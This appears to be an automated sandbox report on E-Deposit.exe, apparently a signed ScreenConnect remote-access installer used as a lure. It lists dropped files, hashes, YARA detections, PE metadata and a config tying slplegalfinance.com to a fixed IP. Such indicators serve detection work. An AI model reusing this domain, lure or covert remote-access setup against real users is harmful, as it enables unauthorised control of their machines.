                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.034063418246108
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLV2/vXbAa3xT:2dL9hK6E46YPaDEVMvH
                                                                                      MD5:1277D2FCD616C8185B3A162C8666415E
                                                                                      SHA1:0B158BA6F97D70920FF4D7F42C1C3F1749DE50BA
                                                                                      SHA-256:F6CE37D361AE436A7E3897D74A4DB81084C88E6664EC5A9E74D0BB48A831B9C3
                                                                                      SHA-512:502BA262BC1652BC52898D0FDA4A102E272ECD41D21BF693FC815874D6F5222E7E5C3BF20EB07EB0A8D8176933438D4F1E1D9FD6391A95F821C3C74C1B22FDFB
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a38%3a04</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.036871464815543
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLVlv/vXbAa3xT:2dL9hK6E46YPaDEV1vH
                                                                                      MD5:35A52F47F09A14400ACF0531D78529B3
                                                                                      SHA1:082C9BDE0CB08A331533978355C4291AC7277439
                                                                                      SHA-256:ACEA18AA49E7C471A58F35C1DB881AF00B115F7B8382A1FC092B74F2DF9E6F25
                                                                                      SHA-512:2821F19869D0376AA785BC55AEC7F0AB63E092819D2387348ECE2A4FEF1F003C6C75A945ECCC0A740AA7474FE6F772AF9699412A03A9501D0ECD84742DE32D2E
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a38%3a47</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.033624107158675
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLJ/vXbAa3xT:2dL9hK6E46YPaDEhvH
                                                                                      MD5:47B15BFBF35163917ADB9DFBC7443D68
                                                                                      SHA1:B9EB1A17E55B2B35A18FCE6B80D9DC8B438B4481
                                                                                      SHA-256:C33463253AE610695E32507339E23AC5E5477DBE4B04FD13A4685BE672B5B12D
                                                                                      SHA-512:F69C3EE8BE4644273D42E7229846CA893DE9D3FAA82A35280BF798D782C17CEEF294420FC7004D7041E02E37BA4FE27B45AB3DE6B080C705260AA63B7829DB0C
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a39%3a20</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.032113942896708
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLV3/vXbAa3xT:2dL9hK6E46YPaDEVPvH
                                                                                      MD5:71CABEA5BCECB13746DA9759F5D7C657
                                                                                      SHA1:0A80ABFC83D0D8B4D13E9F6213EF5523A3DF4D5E
                                                                                      SHA-256:FDEAF2F7A6892118FD8387C4227DE26B54178C3DB87571A9AD775FDF36D7FF93
                                                                                      SHA-512:51E6D87C9FF20F4FBE812BD1FCEF9E2A7E9BF12AE1794363B8222291D0F7D91A74EC8CA9DAEF555EF3F27955172E96D382FEA88CD52302A2BA1613E82A3AAB8A
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a38%3a01</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.033402027619677
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLL/vXbAa3xT:2dL9hK6E46YPaDETvH
                                                                                      MD5:057FE84A8EB39B53B28DC70A6E9F9570
                                                                                      SHA1:4D40143A030964F4D02DCCA4A0B602C0F470C08D
                                                                                      SHA-256:804291DDC865516B7F053EF018A2DF82D05111966D278A2E44E15D6633ACD350
                                                                                      SHA-512:F56DA1E1D8280EA24218CE33F543F69C667C0EB02AAAAE92B2DD422585FD6D936D6465B1445EBC8B7E8674EFB1A92AD4E014C1C3FE8FF9F59A0DC9CB7BE177DF
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a40%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.036227422454059
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLfm/vXbAa3xT:2dL9hK6E46YPaDEf8vH
                                                                                      MD5:0C9CD9A0399B4DA863999AC26580FD49
                                                                                      SHA1:1F5135B33B289B2AC26FC7E5C642D0179A1623A7
                                                                                      SHA-256:4EFD102269EEACC0C0DFD30CD2EC9305FD5419695DADC76AF60AD81326F5361E
                                                                                      SHA-512:DEDEA115BD0AC344166A2BFEDD9E77D1181EB15B0A642075AC514FF2927C7EE62EEF229B4B93635AA40B9C3EB38BF6C4599FF72EEE68BA58D2E3F3D3A2B13E09
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a37%3a58</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.036227422454059
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLfm/vXbAa3xT:2dL9hK6E46YPaDEf8vH
                                                                                      MD5:0C9CD9A0399B4DA863999AC26580FD49
                                                                                      SHA1:1F5135B33B289B2AC26FC7E5C642D0179A1623A7
                                                                                      SHA-256:4EFD102269EEACC0C0DFD30CD2EC9305FD5419695DADC76AF60AD81326F5361E
                                                                                      SHA-512:DEDEA115BD0AC344166A2BFEDD9E77D1181EB15B0A642075AC514FF2927C7EE62EEF229B4B93635AA40B9C3EB38BF6C4599FF72EEE68BA58D2E3F3D3A2B13E09
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a37%3a58</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.07795815855168775
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOUVPQWASKChiVky6l51:2F0i8n0itFzDHFUVPV7r
                                                                                      MD5:79654B3D5A84C6D9BF1AACB08299C584
                                                                                      SHA1:17D38B9217295DCEF248D7B1C14CC74D19C8878B
                                                                                      SHA-256:3C81D4C3FC24E12DCD46EF027F965167EB1D701B30AFA0BD581CC65DB83C1D07
                                                                                      SHA-512:83B60D97FAA3D809C0297EE92EAA01D65A7F475EC1140AF881811C6FB2190FAB861BC66E145C1879771AFAF2DF9071F8F7ECF9C4AC2039B6E00571E5593D5635
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):1.4220241617639573
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:E4tu2rh8FXzrT5aUUi79xK0qcq56Adum1Si5zjCiZdSAYxXV3jzoXrmAdum1SIDC:1tCVTokzEph1fd1ZdAxJu1R
                                                                                      MD5:0D32EE78FE4FDA9A62F7ADC038FA268D
                                                                                      SHA1:83B8EC2E3E5ADFEC1CE76CB93DAC42B3163E2C96
                                                                                      SHA-256:02E973F0F62E5FF3C3E717A2F1484A702D7BD9DC17B3DFD7D94ED4A44778ABD9
                                                                                      SHA-512:D98EEA900A887FD76882C68E35EEB2B845A3844374E163D78376C2A8F294F7D55EC4FD20662FC558BD2FE562124312448EF2C1DE004148313BC94097BE3D0807
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF38B6B2BED31E9ACC.TMP, Author: Joe Security
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):0.23520200624259546
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:xbHDBAdum1S3qcq56Adum1Si5zjCiZdSAYxXV3jzoXrtvk79y:941xph1fd1ZdAxJoI
                                                                                      MD5:6D24D4416D8764B5F41AA10767A4FEA1
                                                                                      SHA1:1E189E02D4E0AB8AFBE9C0B13B6C47E22B2A3AFB
                                                                                      SHA-256:84FF591BF8647400C202B79D8737AD07A7D5E56A193FD7AF6C9743646F67B021
                                                                                      SHA-512:59EC74E86437691D586E0533E4DA05E9BE3A8671A19DDE69726B43D423970FA906F2BFDB160CB0F17F0918192671843DDA78AA80F868CCE7CEEF763AC06EC649
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF41AC279AF635B4E9.TMP, Author: Joe Security
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):1.802197094823399
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:T8PhVuRc06WXzIjT5ni79xK0qcq56Adum1Si5zjCiZdSAYxXV3jzoXrmAdum1SIO:6hV1tjTgzEph1fd1ZdAxJu1R
                                                                                      MD5:3DFC039B312A5D248A6C254150205776
                                                                                      SHA1:F02464F1F94B52C5082AAC69FAD7721EE44ACB4E
                                                                                      SHA-256:77A8952D92E3590146AF33A3797BC3A21E42DF1879B29EAF9371A67F2E853CAE
                                                                                      SHA-512:0C6BF4A5C31BD7103B6F0A5FF939356F008DF4F15148346F0DB92BD154EB23075E2C4D0E1B9DD80F7FB57BBD61E41E9836FF6FBA6A50FFFE8F81A3164B5F398F
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF509A2F73A7E7DE00.TMP, Author: Joe Security
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):1.4220241617639573
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:E4tu2rh8FXzrT5aUUi79xK0qcq56Adum1Si5zjCiZdSAYxXV3jzoXrmAdum1SIDC:1tCVTokzEph1fd1ZdAxJu1R
                                                                                      MD5:0D32EE78FE4FDA9A62F7ADC038FA268D
                                                                                      SHA1:83B8EC2E3E5ADFEC1CE76CB93DAC42B3163E2C96
                                                                                      SHA-256:02E973F0F62E5FF3C3E717A2F1484A702D7BD9DC17B3DFD7D94ED4A44778ABD9
                                                                                      SHA-512:D98EEA900A887FD76882C68E35EEB2B845A3844374E163D78376C2A8F294F7D55EC4FD20662FC558BD2FE562124312448EF2C1DE004148313BC94097BE3D0807
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF54E32773D5EE9706.TMP, Author: Joe Security
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):1.802197094823399
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:T8PhVuRc06WXzIjT5ni79xK0qcq56Adum1Si5zjCiZdSAYxXV3jzoXrmAdum1SIO:6hV1tjTgzEph1fd1ZdAxJu1R
                                                                                      MD5:3DFC039B312A5D248A6C254150205776
                                                                                      SHA1:F02464F1F94B52C5082AAC69FAD7721EE44ACB4E
                                                                                      SHA-256:77A8952D92E3590146AF33A3797BC3A21E42DF1879B29EAF9371A67F2E853CAE
                                                                                      SHA-512:0C6BF4A5C31BD7103B6F0A5FF939356F008DF4F15148346F0DB92BD154EB23075E2C4D0E1B9DD80F7FB57BBD61E41E9836FF6FBA6A50FFFE8F81A3164B5F398F
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD2EA35DDCAE5FE75.TMP, Author: Joe Security
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):1.4220241617639573
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:E4tu2rh8FXzrT5aUUi79xK0qcq56Adum1Si5zjCiZdSAYxXV3jzoXrmAdum1SIDC:1tCVTokzEph1fd1ZdAxJu1R
                                                                                      MD5:0D32EE78FE4FDA9A62F7ADC038FA268D
                                                                                      SHA1:83B8EC2E3E5ADFEC1CE76CB93DAC42B3163E2C96
                                                                                      SHA-256:02E973F0F62E5FF3C3E717A2F1484A702D7BD9DC17B3DFD7D94ED4A44778ABD9
                                                                                      SHA-512:D98EEA900A887FD76882C68E35EEB2B845A3844374E163D78376C2A8F294F7D55EC4FD20662FC558BD2FE562124312448EF2C1DE004148313BC94097BE3D0807
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFF423B0FC94823B9E.TMP, Author: Joe Security
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.427623078135939
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:E-Deposit.exe
                                                                                      File size:5'627'248 bytes
                                                                                      MD5:70d47fa2e078f04400d3d1b236245678
                                                                                      SHA1:987aa3368265fc300b10b4128d8367c3d7a29c6c
                                                                                      SHA256:b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b
                                                                                      SHA512:a078ec2aa08f1928b7cef2b3b17e02e5a52860dd684ad798ab8aca0a55d1069f45e27497fabf15c4e932299fe206ed4e49085848a1bc3ae087b13ece36f768e2
                                                                                      SSDEEP:49152:AEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:pEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                      TLSH:B146E111B3DA95B9D4BF0638D87A82699A74BC044712C7EF53D4BD2D2D32BC05E323A6
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x4014ad
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                      Signature Valid:true
                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                      Signature Validation Error:The operation completed successfully
                                                                                      Error Number:0
                                                                                      Not Before, Not After
                                                                                      • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                      Subject Chain
                                                                                      • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                      Version:3
                                                                                      Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                      Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                      Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                      Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                      Instruction
                                                                                      call 00007F5908EC24AAh
                                                                                      jmp 00007F5908EC1F5Fh
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push 00000000h
                                                                                      call dword ptr [0040D040h]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call dword ptr [0040D03Ch]
                                                                                      push C0000409h
                                                                                      call dword ptr [0040D044h]
                                                                                      push eax
                                                                                      call dword ptr [0040D048h]
                                                                                      pop ebp
                                                                                      ret
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 00000324h
                                                                                      push 00000017h
                                                                                      call dword ptr [0040D04Ch]
                                                                                      test eax, eax
                                                                                      je 00007F5908EC20E7h
                                                                                      push 00000002h
                                                                                      pop ecx
                                                                                      int 29h
                                                                                      mov dword ptr [004148D8h], eax
                                                                                      mov dword ptr [004148D4h], ecx
                                                                                      mov dword ptr [004148D0h], edx
                                                                                      mov dword ptr [004148CCh], ebx
                                                                                      mov dword ptr [004148C8h], esi
                                                                                      mov dword ptr [004148C4h], edi
                                                                                      mov word ptr [004148F0h], ss
                                                                                      mov word ptr [004148E4h], cs
                                                                                      mov word ptr [004148C0h], ds
                                                                                      mov word ptr [004148BCh], es
                                                                                      mov word ptr [004148B8h], fs
                                                                                      mov word ptr [004148B4h], gs
                                                                                      pushfd
                                                                                      pop dword ptr [004148E8h]
                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                      mov dword ptr [004148DCh], eax
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      mov dword ptr [004148E0h], eax
                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                      mov dword ptr [004148ECh], eax
                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                      mov dword ptr [00414828h], 00010001h
                                                                                      Programming Language:
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 build 21022
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x17b70
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
